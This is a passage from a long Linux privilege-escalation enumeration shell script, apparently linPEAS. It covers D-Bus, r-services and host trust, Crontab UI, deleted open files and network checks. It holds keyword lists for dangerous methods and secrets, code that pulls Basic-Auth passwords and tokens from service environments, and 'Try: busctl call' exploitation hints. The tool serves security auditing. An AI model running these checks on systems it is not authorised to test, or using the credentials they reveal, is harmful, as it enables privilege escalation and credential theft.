   7504                 owner_info=$(get_socket_owner "$socket")
   7505                 # Print socket information
   7506                 if [ -z "$perms" ]; then
   7507                     echo "$socket" | sed -${E} "s,$socket,${SED_GREEN},g"
   7508                 else
   7509                     echo "$socket" | sed -${E} "s,$socket,${SED_RED},g"
   7510                     echo "  └─(${RED}${perms}${NC})" | sed -${E} "s,Cannot Connect,${SED_GREEN},g"
   7511                     # Analyze socket protocol if we can connect
   7512                     if echo "$perms" | grep -q "Can Connect"; then
   7513                         analyze_socket_protocol "$socket" "$owner_info"
   7514                     fi
   7515                     # Highlight dangerous ownership
   7516                     if echo "$owner_info" | grep -q "root"; then
   7517                         echo "  └─(${RED}Owned by root${NC})"
   7518                         if echo "$perms" | grep -q "Write"; then
   7519                             echo "  └─High risk: root-owned and writable Unix socket" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   7520                         fi
   7521                     fi
   7522                 fi
   7523             fi
   7524         done
   7525     fi
   7526     echo ""
   7527 fi
   7528 
   7529 fi
   7530 
   7531 if check_mitre_filter "T1559.001"; then
   7532 if ! [ "$SEARCH_IN_FOLDER" ]; then
   7533     print_2title "D-Bus Analysis" "T1559.001"
   7534     print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus"
   7535     # Function to check for dangerous methods
   7536     check_dangerous_methods() {
   7537         service="$1"
   7538         interface="$2"
   7539         dangerous=0
   7540         dangerous_methods=""
   7541         # Common dangerous method patterns - using space-separated string instead of array
   7542         patterns="StartUnit StopUnit RestartUnit EnableUnit DisableUnit SetProperty SetUser SetPassword CreateUser DeleteUser ModifyUser Execute Run Spawn Shell Command Exec Authenticate Login Logout Reboot Shutdown PowerOff Suspend Hibernate Update Install Uninstall Configure Modify Change Delete Remove Add Create Write Read Access Grant Revoke Allow Deny"
   7543         # Get methods for the interface
   7544         methods=$(busctl introspect "$service" "$interface" 2>/dev/null | grep "method" | awk '{print $2}')
   7545         # Check each method against dangerous patterns
   7546         for method in $methods; do
   7547             for pattern in $patterns; do
   7548                 if echo "$method" | grep -qi "$pattern"; then
   7549                     dangerous=1
   7550                     dangerous_methods="${dangerous_methods}${method} "
   7551                 fi
   7552             done
   7553         done
   7554         if [ "$dangerous" -eq 1 ]; then
   7555             echo "  └─(${RED}Potentially dangerous methods found${NC})"
   7556             echo "     └─ $dangerous_methods" | sed 's/^/        /'
   7557         fi
   7558         return $dangerous
   7559     }
   7560     # Function to check for dangerous properties
   7561     check_dangerous_properties() {
   7562         service="$1"
   7563         interface="$2"
   7564         dangerous=0
   7565         dangerous_props=""
   7566         # Common dangerous property patterns - using space-separated string instead of array
   7567         patterns="Executable Command Path User Group Permission Access Auth Password Secret Key Token Credential Config Setting Policy Rule Allow Deny Write Read Execute"
   7568         # Get properties for the interface
   7569         properties=$(busctl introspect "$service" "$interface" 2>/dev/null | grep "property" | awk '{print $2}')
   7570         # Check each property against dangerous patterns
   7571         for prop in $properties; do
   7572             for pattern in $patterns; do
   7573                 if echo "$prop" | grep -qi "$pattern"; then
   7574                     dangerous=1
   7575                     dangerous_props="${dangerous_props}${prop} "
   7576                 fi
   7577             done
   7578         done
   7579         if [ "$dangerous" -eq 1 ]; then
   7580             echo "  └─(${RED}Potentially dangerous properties found${NC})"
   7581             echo "     └─ $dangerous_props" | sed 's/^/        /'
   7582         fi
   7583         return $dangerous
   7584     }
   7585     # Function to analyze service object
   7586     analyze_service_object() {
   7587         dbusservice="$1"
   7588         info=""
   7589         dangerous=0
   7590         # Get service status
   7591         info=$(busctl status "$dbusservice" 2>/dev/null)
   7592         # Check for root ownership
   7593         if echo "$info" | grep -qE "^(UID|EUID|OwnerUID)=0"; then
   7594             echo "  └─(${RED}Running as root${NC})"
   7595             dangerous=1
   7596         fi
   7597         # Get service interfaces
   7598         interfaces=$(busctl tree "$dbusservice" 2>/dev/null)
   7599         if [ -n "$interfaces" ]; then
   7600             echo "  └─ Interfaces:"
   7601             echo "$interfaces" | sed 's/^/     /'
   7602             # Check each interface for dangerous methods and properties
   7603             echo "$interfaces" | while read -r interface; do
   7604                 if [ -n "$interface" ]; then
   7605                     if check_dangerous_methods "$dbusservice" "$interface"; then
   7606                         dangerous=1
   7607                     fi
   7608                     if check_dangerous_properties "$dbusservice" "$interface"; then
   7609                         dangerous=1
   7610                     fi
   7611                 fi
   7612             done
   7613         fi
   7614         # Check for known dangerous services - using space-separated string instead of array
   7615         dangerous_services="org.freedesktop.systemd1 org.freedesktop.PolicyKit1 org.freedesktop.Accounts org.freedesktop.login1 org.freedesktop.hostname1 org.freedesktop.timedate1 org.freedesktop.locale1 org.freedesktop.machine1 org.freedesktop.portable1 org.freedesktop.resolve1 org.freedesktop.timesync1 org.freedesktop.import1 org.freedesktop.export1 org.gnome.SettingsDaemon org.gnome.Shell org.gnome.SessionManager org.gnome.DisplayManager org.gnome.ScreenSaver"
   7616         for dangerous_service in $dangerous_services; do
   7617             if echo "$dbusservice" | grep -qi "$dangerous_service"; then
   7618                 echo "  └─(${RED}Known dangerous service: $dangerous_service${NC})"
   7619                 dangerous=1
   7620             fi
   7621         done
   7622         # If service is dangerous, provide exploitation hints
   7623         if [ "$dangerous" -eq 1 ]; then
   7624             echo "  └─(${RED}Potential privilege escalation vector${NC})"
   7625             echo "     └─ Try: busctl call $dbusservice / [Interface] [Method] [Arguments]"
   7626             echo "     └─ Or: dbus-send --session --dest=$dbusservice / [Interface] [Method] [Arguments]"
   7627         fi
   7628     }
   7629     # Function to analyze policy file
   7630     analyze_policy_file() {
   7631         file="$1"
   7632         weak_policies=0
   7633         # Check file permissions
   7634         if ! [ "$IAMROOT" ] && [ -w "$file" ]; then
   7635             echo "  └─(${RED}Writable policy file${NC})"
   7636             weak_policies=$((weak_policies + 1))
   7637         fi
   7638         # Check general policy
   7639         genpol=$(grep "<policy>" "$file" 2>/dev/null)
   7640         if [ -n "$genpol" ]; then
   7641             echo "  └─(${RED}Weak general policy found${NC})"
   7642             echo "     └─ $genpol" | sed 's/^/        /'
   7643             weak_policies=$((weak_policies + 1))
   7644         fi
   7645         # Check user policies
   7646         userpol=$(grep "<policy user=" "$file" 2>/dev/null | grep -v "root")
   7647         if [ -n "$userpol" ]; then
   7648             echo "  └─(${RED}Weak user policy found${NC})"
   7649             echo "     └─ $userpol" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g"
   7650             weak_policies=$((weak_policies + 1))
   7651         fi
   7652         # Check group policies
   7653         grppol=$(grep "<policy group=" "$file" 2>/dev/null | grep -v "root")
   7654         if [ -n "$grppol" ]; then
   7655             echo "  └─(${RED}Weak group policy found${NC})"
   7656             echo "     └─ $grppol" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"
   7657             weak_policies=$((weak_policies + 1))
   7658         fi
   7659         # Check for allow rules in default context
   7660         allow_rules=$(grep -A 5 "context=\"default\"" "$file" 2>/dev/null | grep "allow")
   7661         if [ -n "$allow_rules" ]; then
   7662             echo "  └─(${RED}Allow rules in default context${NC})"
   7663             echo "     └─ $allow_rules" | sed 's/^/        /'
   7664             weak_policies=$((weak_policies + 1))
   7665         fi
   7666         # Check for specific dangerous policy patterns - using space-separated string instead of array
   7667         dangerous_patterns="allow_any allow_all allow_root allow_user allow_group allow_anonymous allow_any_user allow_any_group allow_any_uid allow_any_gid allow_any_pid allow_any_connection allow_any_method allow_any_property allow_any_signal allow_any_interface allow_any_path allow_any_destination allow_any_sender allow_any_receiver"
   7668         for pattern in $dangerous_patterns; do
   7669             if grep -qi "$pattern" "$file" 2>/dev/null; then
   7670                 echo "  └─(${RED}Dangerous policy pattern found: $pattern${NC})"
   7671                 weak_policies=$((weak_policies + 1))
   7672             fi
   7673         done
   7674         return $weak_policies
   7675     }
   7676     # Analyze D-Bus Service Objects
   7677     dbuslist=$(busctl list 2>/dev/null)
   7678     if [ -n "$dbuslist" ]; then
   7679         echo "$dbuslist" | while read -r dbus_service; do
   7680             # Print service name with highlighting
   7681             echo "$dbus_service" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
   7682             # Analyze service if it's not in the known list
   7683             if ! echo "$dbus_service" | grep -qE "$dbuslistG"; then
   7684                 dbussrvc_object=$(echo "$dbus_service" | cut -d " " -f1)
   7685                 analyze_service_object "$dbussrvc_object"
   7686             fi
   7687         done
   7688     else
   7689         echo_not_found "busctl"
   7690     fi
   7691     # Analyze D-Bus Configuration Files
   7692     if [ "$PSTORAGE_DBUS" ]; then
   7693         echo ""
   7694         print_2title "D-Bus Configuration Files" "T1559.001"
   7695         echo "$PSTORAGE_DBUS" | while read -r dir; do
   7696             [ -n "$dir" ] || continue
   7697             if [ -f "$dir" ]; then
   7698                 echo "Analyzing $dir:"
   7699                 if analyze_policy_file "$dir"; then
   7700                     echo "  └─(${RED}Multiple weak policies found${NC})"
   7701                 fi
   7702                 continue
   7703             fi
   7704             [ -d "$dir" ] || continue
   7705             case "$dir" in
   7706                 */system-services|*/services)
   7707                     echo "Activation definitions in $dir:"
   7708                     grep -RInE '^(Name|Exec|User)=' "$dir" 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed "s,Exec=,${SED_RED}Exec=${NC},g" | sed "s,User=,${SED_RED}User=${NC},g"
   7709                     ;;
   7710                 *)
   7711                     for dbus_file in "$dir"/*; do
   7712                         if [ -f "$dbus_file" ]; then
   7713                             echo "Analyzing $dbus_file:"
   7714                             if analyze_policy_file "$dbus_file"; then
   7715                                 echo "  └─(${RED}Multiple weak policies found${NC})"
   7716                             fi
   7717                         fi
   7718                     done
   7719                     ;;
   7720             esac
   7721         done
   7722     fi
   7723     # Check for D-Bus session bus
   7724     if command -v dbus-send >/dev/null 2>&1; then
   7725         echo ""
   7726         print_3title "D-Bus Session Bus Analysis" "T1559.001"
   7727         if dbus-send --session --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames 2>/dev/null | grep -q "Error"; then
   7728             echo "(${RED}No access to session bus${NC})"
   7729         else
   7730             echo "(${GREEN}Access to session bus available${NC})"
   7731             # List available services on session bus
   7732             session_services=$(dbus-send --session --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames 2>/dev/null | grep "string" | sed 's/^/     /')
   7733             echo "$session_services"
   7734             # Check for known dangerous session services - using space-separated string instead of array
   7735             dangerous_session_services="org.gnome.SettingsDaemon org.gnome.Shell org.gnome.SessionManager org.gnome.DisplayManager org.gnome.ScreenSaver org.freedesktop.Notifications org.freedesktop.ScreenSaver org.freedesktop.PowerManagement org.freedesktop.UPower org.freedesktop.NetworkManager org.freedesktop.Avahi org.freedesktop.UDisks2 org.freedesktop.ModemManager1 org.freedesktop.PackageKit org.freedesktop.PolicyKit1 org.freedesktop.systemd1 org.freedesktop.Accounts org.freedesktop.login1"
   7736             for dangerous_service in $dangerous_session_services; do
   7737                 if echo "$session_services" | grep -qi "$dangerous_service"; then
   7738                     echo "  └─(${RED}Known dangerous session service: $dangerous_service${NC})"
   7739                     echo "     └─ Try: dbus-send --session --dest=$dangerous_service / [Interface] [Method] [Arguments]"
   7740                 fi
   7741             done
   7742         fi
   7743     fi
   7744 fi
   7745 echo ""
   7746 
   7747 fi
   7748 
   7749 if check_mitre_filter "T1021.004"; then
   7750 if ! [ "$SEARCH_IN_FOLDER" ]; then
   7751   print_2title "Legacy r-commands (rsh/rlogin/rexec) and host-based trust" "T1021.004"
   7752   echo ""
   7753   print_3title "Listening r-services (TCP 512-514)" "T1021.004"
   7754   if command -v ss >/dev/null 2>&1; then
   7755     ss -ltnp 2>/dev/null | awk '$1 ~ /^LISTEN$/ && $4 ~ /:(512|513|514)$/ {print}' || echo_not_found "ss"
   7756   elif command -v netstat >/dev/null 2>&1; then
   7757     netstat -ltnp 2>/dev/null | awk '$6 ~ /LISTEN/ && $4 ~ /:(512|513|514)$/ {print}' || echo_not_found "netstat"
   7758   else
   7759     echo_not_found "ss|netstat"
   7760   fi
   7761   echo ""
   7762   print_3title "systemd units exposing r-services" "T1021.004"
   7763   if command -v systemctl >/dev/null 2>&1; then
   7764     systemctl list-unit-files 2>/dev/null | grep -E '^(rlogin|rsh|rexec)\.(socket|service)\b' || echo_not_found "rlogin|rsh|rexec units"
   7765     systemctl list-sockets 2>/dev/null | grep -E '\b(rlogin|rsh|rexec)\.socket\b' || true
   7766   else
   7767     echo_not_found "systemctl"
   7768   fi
   7769   echo ""
   7770   print_3title "inetd/xinetd configuration for r-services" "T1021.004"
   7771   if [ -f /etc/inetd.conf ]; then
   7772     grep -vE '^\s*#|^\s*$' /etc/inetd.conf 2>/dev/null | grep -Ei '\b(shell|login|exec|rsh|rlogin|rexec)\b' 2>/dev/null || echo "  No r-services found in /etc/inetd.conf"
   7773   else
   7774     echo_not_found "/etc/inetd.conf"
   7775   fi
   7776   if [ -d /etc/xinetd.d ]; then
   7777     # Print enabled r-services in xinetd
   7778     for f in /etc/xinetd.d/*; do
   7779       [ -f "$f" ] || continue
   7780       if grep -qiE '\b(service|disable)\b' "$f" 2>/dev/null; then
   7781         if grep -qiE 'service\s+(rsh|rlogin|rexec|shell|login|exec)\b' "$f" 2>/dev/null; then
   7782           # Only warn if not disabled
   7783           if ! grep -qiE '^\s*disable\s*=\s*yes\b' "$f" 2>/dev/null; then
   7784             echo "  $(basename "$f") may enable r-services:"; grep -iE '^(\s*service|\s*disable)' "$f" 2>/dev/null | sed 's/^/    /'
   7785           fi
   7786         fi
   7787       fi
   7788     done
   7789   else
   7790     echo_not_found "/etc/xinetd.d"
   7791   fi
   7792   echo ""
   7793   print_3title "Installed r-service server packages" "T1021.004"
   7794   if command -v dpkg >/dev/null 2>&1; then
   7795     dpkg -l 2>/dev/null | grep -E '\b(rsh-server|rsh-redone-server|krb5-rsh-server|inetutils-inetd|openbsd-inetd|xinetd|netkit-rsh)\b' || echo "  No related packages found via dpkg"
   7796   elif command -v rpm >/dev/null 2>&1; then
   7797     rpm -qa 2>/dev/null | grep -Ei '\b(rsh|rlogin|rexec|xinetd)\b' || echo "  No related packages found via rpm"
   7798   else
   7799     echo_not_found "dpkg|rpm"
   7800   fi
   7801   echo ""
   7802   print_3title "/etc/hosts.equiv and /etc/shosts.equiv" "T1021.004"
   7803   for f in /etc/hosts.equiv /etc/shosts.equiv; do
   7804     if [ -f "$f" ]; then
   7805       perms=$(stat -c %a "$f" 2>/dev/null)
   7806       owner=$(stat -c %U "$f" 2>/dev/null)
   7807       echo "  $f (perm $perms, owner $owner)"
   7808       # Print non-comment lines
   7809       awk 'NF && $0 !~ /^\s*#/ {print "    " $0}' "$f" 2>/dev/null
   7810       if grep -qEv '^\s*#|^\s*$' "$f" 2>/dev/null; then
   7811         if grep -qE '(^|\s)\+' "$f" 2>/dev/null; then
   7812           echo "    [!] Wildcard '+' trust found"
   7813         fi
   7814       fi
   7815     fi
   7816   done
   7817   echo ""
   7818   print_3title "Per-user .rhosts files" "T1021.004"
   7819   any_rhosts=false
   7820   for rfile in /root/.rhosts /home/*/.rhosts; do
   7821     if [ -f "$rfile" ]; then
   7822       any_rhosts=true
   7823       perms=$(stat -c %a "$rfile" 2>/dev/null)
   7824       owner=$(stat -c %U "$rfile" 2>/dev/null)
   7825       echo "  $rfile (perm $perms, owner $owner)"
   7826       awk 'NF && $0 !~ /^\s*#/ {print "    " $0}' "$rfile" 2>/dev/null
   7827       # Warn on insecure perms (group/other write)
   7828       g=$(printf "%s" "$perms" | cut -c2)
   7829       o=$(printf "%s" "$perms" | cut -c3)
   7830       if [ "${g:-0}" -ge 2 ] || [ "${o:-0}" -ge 2 ]; then
   7831         echo "    [!] Insecure permissions (group/other write)"
   7832       fi
   7833     fi
   7834   done
   7835   if ! $any_rhosts; then echo_not_found ".rhosts"; fi
   7836   echo ""
   7837   print_3title "PAM rhosts authentication" "T1021.004"
   7838   shown=false
   7839   for p in /etc/pam.d/rlogin /etc/pam.d/rsh; do
   7840     if [ -f "$p" ]; then
   7841       shown=true
   7842       echo "  $p:"
   7843       (grep -nEi 'pam_rhosts|pam_rhosts_auth' "$p" 2>/dev/null || echo "    no pam_rhosts* lines") | sed 's/^/    /'
   7844     fi
   7845   done
   7846   if ! $shown; then echo_not_found "/etc/pam.d/rlogin|rsh"; fi
   7847   echo ""
   7848   print_3title "SSH HostbasedAuthentication" "T1021.004"
   7849   if [ -f /etc/ssh/sshd_config ]; then
   7850     if grep -qiE '^[^#]*HostbasedAuthentication\s+yes' /etc/ssh/sshd_config 2>/dev/null; then
   7851       echo "  HostbasedAuthentication yes (check /etc/shosts.equiv or ~/.shosts)"
   7852     else
   7853       echo "  HostbasedAuthentication no or not set"
   7854     fi
   7855   else
   7856     echo_not_found "/etc/ssh/sshd_config"
   7857   fi
   7858   echo ""
   7859   print_3title "Potential DNS control indicators (local)" "T1021.004"
   7860   (ps -eo comm,args 2>/dev/null | grep -Ei '(^|/)(pdns|pdns_server|pdns_recursor|powerdns-admin)( |$)' | grep -Ev 'grep|bash' || echo "  Not detected")
   7861   echo ""
   7862 fi
   7863 
   7864 fi
   7865 
   7866 if check_mitre_filter "T1053.003"; then
   7867 if ! [ "$SEARCH_IN_FOLDER" ]; then
   7868   print_2title "Crontab UI (root) misconfiguration checks" "T1053.003"
   7869   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs"
   7870   # Collect candidate services referencing crontab-ui
   7871   candidates=""
   7872   if command -v systemctl >/dev/null 2>&1; then
   7873     candidates=$(systemctl list-units --type=service --all 2>/dev/null | awk '{print $1}' | grep -Ei '^crontab-ui\.service$' 2>/dev/null)
   7874   fi
   7875   # Fallback: grep service files for ExecStart containing crontab-ui
   7876   if [ -z "$candidates" ]; then
   7877     for dir in /etc/systemd/system /lib/systemd/system; do
   7878       [ -d "$dir" ] || continue
   7879       found=$(grep -RIl "^Exec(Start|StartPre|StartPost)=.*crontab-ui" "$dir" 2>/dev/null | xargs -r -I{} basename {} 2>/dev/null)
   7880       if [ -n "$found" ]; then
   7881         candidates=$(printf "%s\n%s" "$candidates" "$found" | sort -u)
   7882       fi
   7883     done
   7884   fi
   7885   # Also flag if the binary exists or a process seems to be running
   7886   if command -v crontab-ui >/dev/null 2>&1; then
   7887     print_list "crontab-ui binary found at: $(command -v crontab-ui)"$NC
   7888   else
   7889     echo_not_found "crontab-ui"
   7890   fi
   7891   procs=$(ps aux 2>/dev/null | grep -E "(crontab-ui|node .*crontab-ui)" | grep -v grep)
   7892   if [ -n "$procs" ]; then
   7893     print_list "Processes matching crontab-ui? ..................... "$NC
   7894     printf "%s\n" "$procs"
   7895     echo ""
   7896   fi
   7897   # If no candidates detected, exit quietly
   7898   if [ "$candidates" ]; then
   7899     # Iterate candidates and extract interesting data
   7900     printf "%s\n" "$candidates" | while read -r svc; do
   7901       [ -n "$svc" ] || continue
   7902       # Ensure suffix .service if missing
   7903       case "$svc" in
   7904         *.service) : ;;
   7905         *) svc="$svc.service" ;;
   7906       esac
   7907       state=""
   7908       user=""
   7909       if command -v systemctl >/dev/null 2>&1; then
   7910         state=$(systemctl is-active "$svc" 2>/dev/null)
   7911         user=$(systemctl show "$svc" -p User 2>/dev/null | cut -d= -f2)
   7912       fi
   7913       [ -z "$state" ] && state="unknown"
   7914       [ -z "$user" ] && user="unknown"
   7915       echo "Service: $svc (state: $state, User: $user)" | sed -${E} "s,root,${SED_RED},g"
   7916       # Read Environment from systemd (works even if file unreadable in many setups)
   7917       envvals=$(systemctl show "$svc" -p Environment 2>/dev/null | cut -d= -f2-)
   7918       if [ -n "$envvals" ]; then
   7919         basic_user=$(printf "%s\n" "$envvals" | tr ' ' '\n' | grep -E '^BASIC_AUTH_USER=' | head -n1 | cut -d= -f2-)
   7920         basic_pwd=$(printf "%s\n" "$envvals" | tr ' ' '\n' | grep -E '^BASIC_AUTH_PWD=' | head -n1 | cut -d= -f2-)
   7921         dbpath=$(printf "%s\n" "$envvals" | tr ' ' '\n' | grep -E '^CRON_DB_PATH=' | head -n1 | cut -d= -f2-)
   7922         port=$(printf "%s\n" "$envvals" | tr ' ' '\n' | grep -E '^PORT=' | head -n1 | cut -d= -f2-)
   7923         if [ -n "$basic_user" ] || [ -n "$basic_pwd" ]; then
   7924           uprint="$basic_user"
   7925           pprint="$basic_pwd"
   7926           [ -n "$basic_pwd" ] && pprint="$basic_pwd"
   7927           echo "  └─ Basic-Auth credentials in Environment: user='${uprint}' pwd='${pprint}'" | sed -${E} "s,pwd='[^']*',${SED_RED_YELLOW},g"
   7928         fi
   7929         if [ -n "$dbpath" ]; then
   7930           echo "  └─ CRON_DB_PATH: $dbpath"
   7931         fi
   7932         # Check listener bound to localhost
   7933         [ -z "$port" ] && port=8000
   7934         if command -v ss >/dev/null 2>&1; then
   7935           if ss -ltn 2>/dev/null | grep -qE "127\.0\.0\.1:${port}[[:space:]]"; then
   7936             echo "  └─ Listener detected on 127.0.0.1:${port} (likely Crontab UI)."
   7937           fi
   7938         else
   7939           if netstat -tnl 2>/dev/null | grep -qE "127\.0\.0\.1:${port}[[:space:]]"; then
   7940             echo "  └─ Listener detected on 127.0.0.1:${port} (likely Crontab UI)."
   7941           fi
   7942         fi
   7943         # If we know DB path, try to read crontab.db for obvious secrets and check perms
   7944         if [ -n "$dbpath" ] && [ -d "$dbpath" ] && [ -r "$dbpath" ]; then
   7945           dbfile="$dbpath/crontab.db"
   7946           if [ -f "$dbfile" ]; then
   7947             perms=$(ls -ld "$dbpath" 2>/dev/null | awk '{print $1, $3, $4}')
   7948             echo "  └─ DB dir perms: $perms"
   7949             if [ -w "$dbpath" ] || [ -w "$dbfile" ]; then
   7950               echo "     └─ Writable by current user -> potential job injection!" | sed -${E} "s,.*,${SED_RED},g"
   7951             fi
   7952             echo "  └─ Inspecting $dbfile for embedded secrets in commands (zip -P / --password / pass/token/secret)..."
   7953             grep -E "-P[[:space:]]+\S+|--password[[:space:]]+\S+|[Pp]ass(word)?|[Tt]oken|[Ss]ecret" "$dbfile" 2>/dev/null | head -n 20 | sed -${E} "s,(${SED_RED_YELLOW}),\1,g"
   7954           fi
   7955         fi
   7956       fi
   7957       echo ""
   7958     done
   7959   fi
   7960 fi
   7961 
   7962 fi
   7963 
   7964 if check_mitre_filter "T1083"; then
   7965 if [ "$(command -v lsof 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then
   7966     print_2title "Deleted files still open" "T1083"
   7967     print_info "Open deleted files can hide tools and still consume disk space"
   7968     lsof +L1 2>/dev/null | sed -${E} "s,\\(deleted\\),${SED_RED},g"
   7969     echo ""
   7970     print_2title "Deleted executables still running" "T1083"
   7971     print_info "A deleted /proc/<PID>/exe may indicate tampering, cleanup, or a useful runtime-only binary"
   7972     ls -l /proc/[0-9]*/exe 2>/dev/null | grep "(deleted)" | sed -${E} "s,\\(deleted\\),${SED_RED},g" | head -n 200
   7973     echo ""
   7974 elif [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then
   7975     print_2title "Deleted files still open" "T1083"
   7976     print_info "lsof not found, scanning /proc for deleted file descriptors"
   7977     ls -l /proc/[0-9]*/fd 2>/dev/null | grep "(deleted)" | sed -${E} "s,\\(deleted\\),${SED_RED},g" | head -n 200
   7978     echo ""
   7979     print_2title "Deleted executables still running" "T1083"
   7980     print_info "Scanning /proc/<PID>/exe for deleted runtime binaries"
   7981     ls -l /proc/[0-9]*/exe 2>/dev/null | grep "(deleted)" | sed -${E} "s,\\(deleted\\),${SED_RED},g" | head -n 200
   7982     echo ""
   7983 fi
   7984 
   7985 fi
   7986 
   7987 fi
   7988 
   7989 fi
   7990 echo ''
   7991 echo ''
   7992 if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
   7993 
   7994 if echo $CHECKS | grep -q network_information; then
   7995 if check_mitre_filter "T1016,T1590,T1018,T1040,T1049"; then
   7996 print_title "Network Information"
   7997 if check_mitre_filter "T1016"; then
   7998 # Function to parse network interfaces from /proc/net/dev and other sources
   7999 parse_network_interfaces() {
   8000     # Try to get interfaces from /proc/net/dev
   8001     if [ -f "/proc/net/dev" ]; then
   8002         echo "Network Interfaces from /proc/net/dev:"
   8003         echo "----------------------------------------"
   8004         # Skip header lines and format output
   8005         grep -v "^Inter\|^ face" /proc/net/dev | while read -r line; do
   8006             iface=$(echo "$line" | awk -F: '{print $1}' | tr -d ' ')
   8007             if [ -n "$iface" ]; then
   8008                 echo "Interface: $iface"
   8009                 # Try to get IP address from /sys/class/net
   8010                 if [ -f "/sys/class/net/$iface/address" ]; then
   8011                     mac=$(cat "/sys/class/net/$iface/address" 2>/dev/null)
   8012                     echo "  MAC: $mac"
   8013                 fi
   8014                 # Try to get IP from /sys/class/net
   8015                 if [ -d "/sys/class/net/$iface/ipv4" ]; then
   8016                     for ip_file in /sys/class/net/$iface/ipv4/addr_*; do
   8017                         if [ -f "$ip_file" ]; then
   8018                             ip=$(cat "$ip_file" 2>/dev/null)
   8019                             echo "  IP: $ip"
   8020                         fi
   8021                     done
   8022                 fi
   8023                 # Get interface state
   8024                 if [ -f "/sys/class/net/$iface/operstate" ]; then
   8025                     state=$(cat "/sys/class/net/$iface/operstate" 2>/dev/null)
   8026                     echo "  State: $state"
   8027                 fi
   8028                 echo ""
   8029             fi
   8030         done
   8031     fi
   8032     # Try to get additional info from /proc/net/fib_trie
   8033     if [ -f "/proc/net/fib_trie" ]; then
   8034         echo "Additional IP Information from fib_trie:"
   8035         echo "----------------------------------------"
   8036         grep -A1 "Main" /proc/net/fib_trie | grep -v "\-\-" | while read -r line; do
   8037             if echo "$line" | grep -q "Main"; then
   8038                 echo "Network: $(echo "$line" | awk '{print $2}')"
   8039             elif echo "$line" | grep -q "/"; then
   8040                 echo "  IP: $(echo "$line" | awk '{print $2}')"
   8041             fi
   8042         done
   8043     fi
   8044 }
   8045 print_2title "Interfaces" "T1016"
   8046 cat /etc/networks 2>/dev/null
   8047 # Try standard tools first, then fall back to our custom function
   8048 if command -v ifconfig >/dev/null 2>&1; then
   8049     ifconfig 2>/dev/null
   8050 elif command -v ip >/dev/null 2>&1; then
   8051     ip a 2>/dev/null
   8052 else
   8053     parse_network_interfaces
   8054 fi
   8055 if command -v ip >/dev/null 2>&1; then
   8056     print_3title "Routing & policy quick view" "T1016"
   8057     ip route 2>/dev/null
   8058     ip -6 route 2>/dev/null | head -n 30
   8059     echo ""
   8060     ip rule 2>/dev/null
   8061     print_3title "Virtual/overlay interfaces quick view" "T1016"
   8062     ip -d link 2>/dev/null | grep -E "^[0-9]+:|veth|docker|cni|flannel|br-|bridge|vlan|bond|tun|tap|wg|tailscale" | sed -${E} "s,veth|docker|cni|flannel|br-|bridge|vlan|bond|tun|tap|wg|tailscale,${SED_RED_YELLOW},g"
   8063     print_3title "Network namespaces quick view" "T1016"
   8064     ip netns list 2>/dev/null
   8065     ls -la /var/run/netns/ 2>/dev/null
   8066 fi
   8067 print_3title "Forwarding status" "T1016"
   8068 sysctl net.ipv4.ip_forward net.ipv6.conf.all.forwarding 2>/dev/null | sed -${E} "s,=[[:space:]]*1,${SED_RED_YELLOW},g"
   8069 echo ""
   8070 
   8071 fi
   8072 
   8073 if check_mitre_filter "T1016,T1018"; then
   8074 # Function to get hostname using multiple methods
   8075 get_hostname_info() {
   8076     print_3title "Hostname Information" "T1016,T1018"
   8077     # Try multiple methods to get hostname
   8078     if command -v hostname >/dev/null 2>&1; then
   8079         echo "System hostname: $(hostname 2>/dev/null)"
   8080         echo "FQDN: $(hostname -f 2>/dev/null)"
   8081     else
   8082         # Fallback methods
   8083         if [ -f "/proc/sys/kernel/hostname" ]; then
   8084             echo "System hostname: $(cat /proc/sys/kernel/hostname 2>/dev/null)"
   8085         fi
   8086         if [ -f "/etc/hostname" ]; then
   8087             echo "Hostname from /etc/hostname: $(cat /etc/hostname 2>/dev/null)"
   8088         fi
   8089     fi
   8090     echo ""
   8091 }
   8092 # Function to get hosts file information
   8093 get_hosts_info() {
   8094     print_3title "Hosts File Information" "T1016,T1018"
   8095     if [ -f "/etc/hosts" ]; then
   8096         echo "Contents of /etc/hosts:"
   8097         grep -v "^#" /etc/hosts 2>/dev/null | grep -v "^$" | while read -r line; do
   8098             echo "  $line"
   8099         done
   8100     fi
   8101     echo ""
   8102 }
   8103 # Function to get DNS information
   8104 get_dns_info() {
   8105     print_3title "DNS Configuration" "T1016,T1018"
   8106     # Get resolv.conf information
   8107     if [ -f "/etc/resolv.conf" ]; then
   8108         echo "DNS Servers (resolv.conf):"
   8109         grep -v "^#" /etc/resolv.conf 2>/dev/null | grep -v "^$" | while read -r line; do
   8110             if echo "$line" | grep -q "nameserver"; then
   8111                 echo "  $(echo "$line" | awk '{print $2}')"
   8112             elif echo "$line" | grep -q "search\|domain"; then
   8113                 echo "  $line"
   8114             fi
   8115         done
   8116     fi
   8117     # Check for systemd-resolved configuration
   8118     if [ -f "/etc/systemd/resolved.conf" ]; then
   8119         echo -e "\nSystemd-resolved configuration:"
   8120         grep -v "^#" /etc/systemd/resolved.conf 2>/dev/null | grep -v "^$" | while read -r line; do
   8121             echo "  $line"
   8122         done
   8123     fi
   8124     # Check for NetworkManager DNS settings
   8125     if [ -d "/etc/NetworkManager" ]; then
